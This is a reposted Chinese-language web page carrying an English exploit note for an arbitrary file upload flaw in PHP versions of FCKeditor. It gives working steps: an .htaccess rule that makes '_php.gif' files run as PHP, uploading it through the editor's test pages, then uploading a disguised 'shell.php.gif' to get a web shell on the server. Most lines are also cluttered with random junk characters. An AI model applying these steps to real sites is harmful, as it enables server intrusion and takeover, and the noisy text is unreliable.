FCKeditor所有php版本Upload上传漏洞
% p; T+ ~7 ^$ S" |7 W& y+ z作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
* T7 }8 j( Y& X) R' u' g减小字体 增大字体% a" X+ Q/ c" E( ~+ h
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
& ]+ |) T8 [. ^[+] Date: 2011
8 @: N! C- M) n( W2 p1 g4 D1 f[+] Author : sinesafe.cn
6 a5 t! D5 w a7 A! u2 n. g[+] Website : WwW.sinesafe.cn( M0 b2 K E2 Y% C
———————————————————
' n3 F/ C+ w- }4 K6 T4 k( l1.create a htaccess file:: O2 P7 C; x$ _+ k" o1 L! r
code:4 |1 [. z' V; E
<FilesMatch “_php.gif”>( M, U7 e* l; Z8 ^
SetHandler application/x-httpd-php2 y# _. g* O* G7 C: x v$ N/ m
</FilesMatch>
/ F6 l* r1 L; F' J: @; W, d( A ~5 S8 T
2.Now upload this htaccess with FCKeditor.; t9 L& c0 X% Q% ^* V5 n5 h
7 C+ K9 R/ E nhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
! I; m. Z$ M d1 `# @- I) b7 e6 j6 a
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html1 W' Z4 {- U: S' D" j8 s4 O
% _" @: V v5 c. m7 W* n# i———————————————————————————————-( |8 U! w- K1 t- c
3.Now upload shell.php.gif with FCKeditor.: P4 u# S( c8 d
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
$ U' T F* `, j) t2 ]5.http://www.sinesafe.cn/anything/shell_php.gif( A- i7 Z" E& R0 ]$ `" J- m
6.Now shell is available from server. |
) {$ v2 t% ~1 [3 ~" Z0 ~
2 }% Q8 T v( z# V( V
8 a& L! Q6 |& W0 k2 }1 }. y3 i
|
发表于 2013-10-27 17:25:21
收藏
支持
反对